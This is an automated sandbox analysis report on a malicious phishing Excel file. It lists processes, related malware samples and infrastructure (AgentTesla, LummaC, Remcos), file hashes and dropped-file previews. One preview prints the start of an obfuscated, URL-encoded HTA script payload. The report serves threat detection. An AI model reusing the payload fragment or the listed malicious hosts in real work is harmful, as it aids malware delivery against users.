                                              • EGA enabled
                                              • GSI enabled (VBA)
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Sample name:PO#BBGR2411PO69.xls
                                              Detection:MAL
                                              Classification:mal100.phis.troj.expl.evad.winXLS@31/36@11/4
                                              EGA Information:
                                              • Successful, ratio: 50%
                                              HCA Information:
                                              • Successful, ratio: 93%
                                              • Number of executed functions: 24
                                              • Number of non-executed functions: 52
                                              Cookbook Comments:
                                              • Found application associated with file extension: .xls
                                              • Changed system and user locale, location and keyboard layout to French - France
                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                              • Attach to Office via COM
                                              • Active ActiveX Object
                                              • Active ActiveX Object
                                              • Scroll down
                                              • Close Viewer

                                              Warnings

                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                              • Execution Graph export aborted for target mshta.exe, PID 1520 because there are no executed function
                                              • Execution Graph export aborted for target mshta.exe, PID 3684 because there are no executed function
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              01:24:36API Interceptor136x Sleep call for process: mshta.exe modified
                                              01:24:42API Interceptor218x Sleep call for process: powershell.exe modified
                                              01:24:52API Interceptor22x Sleep call for process: wscript.exe modified
                                              01:25:21API Interceptor6x Sleep call for process: aspnet_compiler.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              142.215.209.77Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                  188.114.96.6ibk0BQaWAo.exeGet hashmaliciousUnknownBrowse
                                                  • orbitdownloader.com/
                                                  ibk0BQaWAo.exeGet hashmaliciousUnknownBrowse
                                                  • orbitdownloader.com/
                                                  e6o7hKFmfC.exeGet hashmaliciousFormBookBrowse
                                                  • www.astrofrance.online/uem3/?BpE=hw9wdlgRPJgu6mhEw3v3abu2JdZhLnzfTKsoEzFZGCpKAu6wx+OREaAyoHMqAY/6AEPW&SH=IDKTKDM
                                                  188.114.97.6ibk0BQaWAo.exeGet hashmaliciousUnknownBrowse
                                                  • orbitdownloader.com/
                                                  ibk0BQaWAo.exeGet hashmaliciousUnknownBrowse
                                                  • orbitdownloader.com/
                                                  INVOICE087667899.exeGet hashmaliciousUnknownBrowse
                                                  • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                                  ZciowjM9hN.exeGet hashmaliciousLokibotBrowse
                                                  • vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  ip.1016.filemail.comComprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                  • 142.215.209.77
                                                  Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                  • 142.215.209.77
                                                  0028BGL880-2024.PDF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                  • 192.240.97.18

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  CLOUDFLARENETUShttp://demo.specialistbanking.co.uk/ad.PDFGet hashmaliciousUnknownBrowse
                                                  • 104.16.123.96
                                                  ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 172.67.145.234
                                                  file.exeGet hashmaliciousAmadey, Discord Token Stealer, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                  • 172.67.165.166
                                                  sora.mips.elfGet hashmaliciousMiraiBrowse
                                                  • 1.4.51.14
                                                  sora.ppc.elfGet hashmaliciousMiraiBrowse
                                                  • 172.68.102.131
                                                  file.exeGet hashmaliciousLummaCBrowse
                                                  • 104.21.82.174
                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                  • 172.67.165.166
                                                  https://wixauth-processing.es/wp/vite-react-web.vercel.app.htmlGet hashmaliciousUnknownBrowse
                                                  • 104.21.26.223
                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                  • 104.21.16.9
                                                  tyhkamwdmrg.exeGet hashmaliciousLummaC StealerBrowse
                                                  • 172.67.165.166
                                                  CLOUDFLARENETUShttp://demo.specialistbanking.co.uk/ad.PDFGet hashmaliciousUnknownBrowse
                                                  • 104.16.123.96
                                                  ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 172.67.145.234
                                                  file.exeGet hashmaliciousAmadey, Discord Token Stealer, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                  • 172.67.165.166
                                                  sora.mips.elfGet hashmaliciousMiraiBrowse
                                                  • 1.4.51.14
                                                  sora.ppc.elfGet hashmaliciousMiraiBrowse
                                                  • 172.68.102.131
                                                  file.exeGet hashmaliciousLummaCBrowse
                                                  • 104.21.82.174
                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                  • 172.67.165.166
                                                  https://wixauth-processing.es/wp/vite-react-web.vercel.app.htmlGet hashmaliciousUnknownBrowse
                                                  • 104.21.26.223
                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                  • 104.21.16.9
                                                  tyhkamwdmrg.exeGet hashmaliciousLummaC StealerBrowse
                                                  • 172.67.165.166
                                                  HUMBER-COLLEGECAComprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                  • 142.215.209.77
                                                  Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                  • 142.215.209.77
                                                  https://www.filemail.com/d/dolcahmytquddazGet hashmaliciousUnknownBrowse
                                                  • 142.215.209.74
                                                  la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                  • 142.214.116.218
                                                  geHxbPNEMi.vbsGet hashmaliciousUnknownBrowse
                                                  • 142.215.209.78
                                                  QUOTATION.xlsGet hashmaliciousHTMLPhisherBrowse
                                                  • 142.215.209.78
                                                  Shipping Document.xlsGet hashmaliciousHTMLPhisherBrowse
                                                  • 142.215.209.78
                                                  segura.vbsGet hashmaliciousRemcosBrowse
                                                  • 142.215.209.78
                                                  asegurar.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                                                  • 142.215.209.78
                                                  solicitud de cotizaci#U00f3n..09.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                  • 142.215.209.78

                                                  JA3 Fingerprints

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  05af1f5ca1b87cc9cc9b25185115607dComprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                  • 142.215.209.77
                                                  Swift copy.xlsGet hashmaliciousHTMLPhisherBrowse
                                                  • 142.215.209.77
                                                  RFQ-ROJECT FTL 010-271124.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                  • 142.215.209.77
                                                  Sipari#U015f_listesi.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                  • 142.215.209.77
                                                  Swiftcopy.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                  • 142.215.209.77
                                                  Pedido No 4500924462.xlsGet hashmaliciousUnknownBrowse
                                                  • 142.215.209.77
                                                  26-11-24_. AVIMAR SHIP CHANDLERS.xlsGet hashmaliciousHTMLPhisherBrowse
                                                  • 142.215.209.77
                                                  List#U0103 de produse.xlsGet hashmaliciousHTMLPhisherBrowse
                                                  • 142.215.209.77
                                                  Document.exeGet hashmaliciousMassLogger RATBrowse
                                                  • 142.215.209.77
                                                  Shipping Document.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                  • 142.215.209.77
                                                  7dcce5b76c8b17472d024758970a406bSwiftCopy.xla.xlsxGet hashmaliciousUnknownBrowse
                                                  • 188.114.96.6
                                                  • 188.114.97.6
                                                  SwiftCopy.xla.xlsxGet hashmaliciousUnknownBrowse
                                                  • 188.114.96.6
                                                  • 188.114.97.6
                                                  Swift copy.xlsGet hashmaliciousHTMLPhisherBrowse
                                                  • 188.114.96.6
                                                  • 188.114.97.6
                                                  RFQ-ROJECT FTL 010-271124.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                  • 188.114.96.6
                                                  • 188.114.97.6
                                                  Sipari#U015f_listesi.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                  • 188.114.96.6
                                                  • 188.114.97.6
                                                  Swiftcopy.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                  • 188.114.96.6
                                                  • 188.114.97.6
                                                  Order Summary.xlsGet hashmaliciousUnknownBrowse
                                                  • 188.114.96.6
                                                  • 188.114.97.6
                                                  Order Summary.xlsGet hashmaliciousUnknownBrowse
                                                  • 188.114.96.6
                                                  • 188.114.97.6
                                                  container payment.xlsGet hashmaliciousUnknownBrowse
                                                  • 188.114.96.6
                                                  • 188.114.97.6
                                                  Payment Advice.xlsGet hashmaliciousHTMLPhisherBrowse
                                                  • 188.114.96.6
                                                  • 188.114.97.6

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):15189
                                                  Entropy (8bit):5.0343247648743
                                                  Encrypted:false
                                                  SSDEEP:384:nWraVoGIpN6KQkj2Lkjh4iUxTnaVjvCnS/OdBmRWDf:nW+V3IpNBQkj2Oh4iUxDaVjvCnS/OdBD
                                                  MD5:7BC3FB6565E144A52C5F44408D5D80DF
                                                  SHA1:C3C443BF9F29EAA84B0A580FD5469F4C5CC57F77
                                                  SHA-256:EF6A75C051D70322EDCD5A89E6398CC00E3D860E87A0C7981310D30837CBA495
                                                  SHA-512:D0A936BAF2277884518EDF4729F88DA74C7BAA5BBB58C1060CE66DE92A23694EA993CA69D8820816C5D28182E9A38EE59DE821EE3A73F0D85DBBC74D406285A5
                                                  Malicious:false
                                                  Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........V.7...?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet.........._.7...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):64
                                                  Entropy (8bit):0.34726597513537405
                                                  Encrypted:false
                                                  SSDEEP:3:Nlll:Nll
                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                  Malicious:false
                                                  Preview:@...e...........................................................

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestthingsgivenmegood[1].hta

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                  Category:modified
                                                  Size (bytes):159457
                                                  Entropy (8bit):2.478404137107947
                                                  Encrypted:false
                                                  SSDEEP:96:4owZw9d6yfag3at3EUW87FEtLbJte8I40Jduvpv3at3EUW87FEtLbYZte8I40Jd/:4Lw3OmHsaZYJPdQ
                                                  MD5:51D8EF6EBCD710802189071E5AD9F154
                                                  SHA1:3D0178A66A7ED8FB3B53C7B85EA447043ED51AC3
                                                  SHA-256:66A1E9B4E372B5040F6CD336D1BC57381B4486E56C4B0E114819B49514B21A20
                                                  SHA-512:CF352AAC8D86126A3C50A1B304245D2C4B94DDA902818B250F2B089E1B38240F9E13DD7F84B22C657C133C4E91A5B3CF90C2AA9E63F4909BE629A4EF6788A7E6
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_HtmlPhish_44, Description: Yara detected HtmlPhish_44, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestthingsgivenmegood[1].hta, Author: Joe Security
                                                  Preview:<script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3Em%3D%27%253CScript%2520Language%253D%2527Javascript%2527%253E%250A%253C%2521--%2520HTML%2520Encryption%2520provided%2520by%2520tufat.com%2520--%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2527%25253C%252521%252544%25254F%252543%252554%252559%252550%252545%252520%252568%252574%25256D%25256C%25253E%25250A%25253C%25256D%252565%252574%252561%252520%252568%252574%252574%252570%25252D%252565%252571%252575%252569%252576%25253D%252522%252558%25252D%252555%252541%25252D%252543%25256F%25256D%252570%252561%252574%252569%252562%25256C%252565%252522%252520%252563%25256F%25256E%252574%252565%25256E%252574%25253D%252522%252549%252545%25253D%252545%25256D%252575%25256C%252561%252574%252565%252549%252545%252538%252522%252520%25253E%25250A%25253C%252568%252574%25256D%25256C%25253E%25250A%25253C%252562%25256F%252564%252579%25253E%25250A%25253C%252553%252543%252572%252569%252550%252554%252520%252554%252559%252550%252545%2525

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\seethebestmagicalthignsgivegoodforu[1].tiff

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (3453), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):154384
                                                  Entropy (8bit):3.8033508297517873
                                                  Encrypted:false
                                                  SSDEEP:3072:ECFOB9LjxbTAKZGEDqmCFOB9LjxbTAKZGEDMCFOB9LjxbTAKZGEDP:EcoBWKZGEDqmcoBWKZGEDMcoBWKZGEDP
                                                  MD5:297E6244E9EDCAEB8B1F6705E40CB51D
                                                  SHA1:230882871D7FF55237292422E02EEF841CF5F21E
                                                  SHA-256:9CCE8E2B2E0A7512420E3C93DEC3B33DB128D7FD694F6FC9AE1C8C9FF9817365
                                                  SHA-512:F722D14668F8B75AB7B2DB08FF3A2D2B85007C8902E213B094C24DB2694E785AFF8D41F0117E18414E4807AA30BA2A57C01C16186B046B23C64E7F4320D972AE
                                                  Malicious:false
                                                  Preview:...... . . . .....Q.k.i.x.m.W.O.c.e.K.O.z.a.U.i. .=. .".j.W.W.L.N.q.L.L.Z.S.T.j.J.n.h.".....h.N.L.W.d.i.k.L.k.j.U.p.e.P.K. .=. .".P.C.l.a.h.f.W.L.d.z.c.G.L.O.h.".....e.a.q.A.q.s.K.W.K.W.i.e.m.h.C. .=. .".o.L.s.O.k.N.A.t.k.L.N.p.g.u.I.".........q.P.d.P.P.Q.m.t.x.W.B.R.o.L.W. .=. .".W.f.B.z.R.l.Z.c.W.U.N.S.A.i.q.".....T.U.c.N.i.e.L.t.U.L.z.B.i.O.A. .=. .".p.h.L.N.m.i.b.O.N.t.o.e.U.Z.P.".....B.W.n.L.t.A.u.b.L.W.u.f.c.a.G. .=. .".L.c.U.n.h.L.o.k.n.L.L.Z.G.o.T.".....N.J.z.W.W.Z.f.x.L.N.W.a.Z.h.A. .=. .".p.G.N.p.G.C.f.t.H.L.e.h.L.K.p.".....c.e.h.l.P.Q.P.t.k.z.S.Z.k.A.e. .=. .".B.K.N.i.i.K.U.q.c.W.m.B.i.e.c.".....b.k.o.v.K.L.h.K.A.P.W.K.L.K.U. .=. .".l.i.G.l.d.C.f.W.B.c.e.c.c.h.z.".....U.A.u.u.B.g.s.R.L.S.Q.G.Q.L.H. .=. .".P.W.L.k.f.K.h.h.W.A.W.g.L.L.Z.".....u.W.k.e.i.W.i.U.K.L.h.l.W.k.q. .=. .".L.W.o.T.K.B.L.Q.L.o.b.c.x.a.G.".....K.p.m.p.K.L.L.m.i.e.c.i.v.L.L. .=. .".Z.L.K.O.q.k.f.h.u.e.L.B.Z.Q.L.".....O.N.k.C.f.h.N.W.G.u.W.e.L.W.T. .=. .".k.W.N.f.p.z.L.t.O.K.v.l.L.e.C.".....d.K.k.t.U.U.G.U.

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\19F2129E.emf

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                  Category:dropped
                                                  Size (bytes):1293620
                                                  Entropy (8bit):4.563127917199792
                                                  Encrypted:false
                                                  SSDEEP:6144:HepUelSAzNeNpVAZSedri2/Op4mD3f5ReZdZJElOFmkDrvwA2w4Meh/q4MmuRDrM:HepRlSPiS4ri2/lmzCJEuL1eU1muq
                                                  MD5:F71C973B5E362DFD6408D6C009E5643E
                                                  SHA1:24B3CE67B31BFD4791287932206D54C73489424E
                                                  SHA-256:27D0986B7EC233689490135118670F01325F21DFD6F60492AF5D62C7CF1E3045
                                                  SHA-512:4C3F506BC4313437C9194EED3CD5AB6616490AE376FC61DD38D8E00F975C41A23FC8D322E41CFBEC380F04F49ADF6E77A3B22BB5C96EBE714F5713B09838F1F4
                                                  Malicious:false
                                                  Preview:....l...........%...............@m..?... EMF....4....!..1...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2DCF6843.emf

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                  Category:dropped
                                                  Size (bytes):1293620
                                                  Entropy (8bit):4.563127917199792
                                                  Encrypted:false
                                                  SSDEEP:6144:HepUelSAzNeNpVAZSedri2/Op4mD3f5ReZdZJElOFmkDrvwA2w4Meh/q4MmuRDrM:HepRlSPiS4ri2/lmzCJEuL1eU1muq
                                                  MD5:F71C973B5E362DFD6408D6C009E5643E
                                                  SHA1:24B3CE67B31BFD4791287932206D54C73489424E
                                                  SHA-256:27D0986B7EC233689490135118670F01325F21DFD6F60492AF5D62C7CF1E3045
                                                  SHA-512:4C3F506BC4313437C9194EED3CD5AB6616490AE376FC61DD38D8E00F975C41A23FC8D322E41CFBEC380F04F49ADF6E77A3B22BB5C96EBE714F5713B09838F1F4
                                                  Malicious:false
                                                  Preview:....l...........%...............@m..?... EMF....4....!..1...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6428785C.emf

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                  Category:dropped
                                                  Size (bytes):109544
                                                  Entropy (8bit):4.282675970330063
                                                  Encrypted:false
                                                  SSDEEP:768:I4KlWqWxZiDQ4hHdCUeHxCDJB9Cnh3KCg0F9BV:I42WxF4MyeKCV
                                                  MD5:F7B9A8F20E64B2CB6B572BCBA5866236
                                                  SHA1:2F092A0A518639332BE76BF60DBB966AC331D356
                                                  SHA-256:72447B22A4BBC05B9E9183DF2ADB712AB51C3A45C6247C2303024197D1623F57
                                                  SHA-512:4A78624A9EB02208F3F30D03CC53EBE00BDD2C59E8F7719E35E706D51CD2F8D0D330BE6D6FAD2A9652536F888CB99E0CBE1E3B97A05EA65CB5914C37C501B728
                                                  Malicious:false
                                                  Preview:....l...............r............C...a.. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9623E607.emf

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                  Category:dropped
                                                  Size (bytes):44256
                                                  Entropy (8bit):3.147465798679962
                                                  Encrypted:false
                                                  SSDEEP:384:j1W5NF0vUXfOjwTsiyGGiugBhUErpxTORe4tyJ2c:ZWYW+GGidBhUErpxTORe4ty5
                                                  MD5:36D8FF25D14E7E2FBB1968E952FF9C17
                                                  SHA1:E3BD7140DA6CAD87C5A1D5417DFBDD7B0E67B110
                                                  SHA-256:305DCBFBEB9FFEE587E061D779CA1DDF31939ECD64EEE7D8A22BA9D640B48633
                                                  SHA-512:B4B753222F617F78B36949BD9F37E13D68D9FD7367484BEE799F0D7AE38E1705E997A6409251BC2B9830012536FBD08C3C6CB7411D9122F939833F38E303DCBF
                                                  Malicious:false
                                                  Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F6FEC4AD.emf

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                  Category:dropped
                                                  Size (bytes):44256
                                                  Entropy (8bit):3.15066292565687
                                                  Encrypted:false
                                                  SSDEEP:384:IhpMW5NFNimpUIuOjwTsiyGGiugBhUErpxTORe4tyIWY5:BWzi+8+GGidBhUErpxTORe4tyI9
                                                  MD5:F1EC2E98B0F577B675156B13DCF94105
                                                  SHA1:4FF2D02051E92771FBB245BA8095C80148A0F61A
                                                  SHA-256:66AFB9C12E20A08F9A713C366EDE8A9CD8F4A93B7D7BFC76205013C28A3250E9
                                                  SHA-512:6E442DB49BF2A429AD2CA7CB3804D79791C1E1FEB414F69FDDD58042E98C5AA5BFC1C751713DB76DD58DC9F3CAC3A7C491228797A909F8FD0291048E8F2FC9BE
                                                  Malicious:false
                                                  Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................

                                                  C:\Users\user\AppData\Local\Temp\RES1610.tmp

                                                  Download File
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Dec 2 06:25:06 2024, 1st section name ".debug$S"
                                                  Category:dropped
                                                  Size (bytes):1328
                                                  Entropy (8bit):4.001579466132155
                                                  Encrypted:false
                                                  SSDEEP:24:H3se9E2U5XatdH3wKdNWI+ycuZhNAUakSh5PNnqSqd:MlQgKd41ulAUa3h7qSK
                                                  MD5:754B4C47A9BA7BC7F4393E1F2BFD5855
                                                  SHA1:D70C8D56B63B382E9C8B18FA5EB3CB079C895168
                                                  SHA-256:198AAF02DE3255F7BB7C49B6B62ED27163CE3F566EF56B97307CEC25AF14EF43
                                                  SHA-512:2E8652663C39AFC26B28E03DCC0DEBC62C857E02392E4885EF4A737FF4D2D5E22E33BAE5641ECFB374BDCD0C2D2EF0587AD777BD2CF1E6D10F6C086586899193
                                                  Malicious:false
                                                  Preview:L....RMg.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\xmqw35tj\CSCD4982987C63C4803AF625DBF77F42E41.TMP..................M..D*.E ..gM6..........4.......C:\Users\user\AppData\Local\Temp\RES1610.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.m.q.w.3.5.t.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                  C:\Users\user\AppData\Local\Temp\RESC5BF.tmp

                                                  Download File
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Dec 2 06:24:46 2024, 1st section name ".debug$S"
                                                  Category:dropped
                                                  Size (bytes):1328
                                                  Entropy (8bit):3.9950141320650583
                                                  Encrypted:false
                                                  SSDEEP:24:HYe9E2UPkwDOLdHhfwKdNWI+ycuZhNzakSlPNnqSqd:AEWKd41ulza3/qSK
                                                  MD5:CE802207FA53152661802E440FC0615E
                                                  SHA1:65C197F3290D1C1A78C292EAB183E4D96C813A73
                                                  SHA-256:914283CECCE296E850142517C1B005827BC16F8F14E99F111DCFC08A10A3E9BE
                                                  SHA-512:E55BE4BB9905045EC6351D736B5A90BFC5B8E5F93341638862891824B287E8BE275796E2BF5D068273687E5E290D3BD7701A402D18436EE7590657459D9379C3
                                                  Malicious:false
                                                  Preview:L....RMg.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\r3q12jmu\CSC7CCBE632744241EDA0AD204CE9F5FD7D.TMP.................<.tj.o...bn...........4.......C:\Users\user\AppData\Local\Temp\RESC5BF.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.3.q.1.2.j.m.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                  C:\Users\user\AppData\Local\Temp\abgkk4xv.hlh.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1

                                                  C:\Users\user\AppData\Local\Temp\cc1tntjh.vr4.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
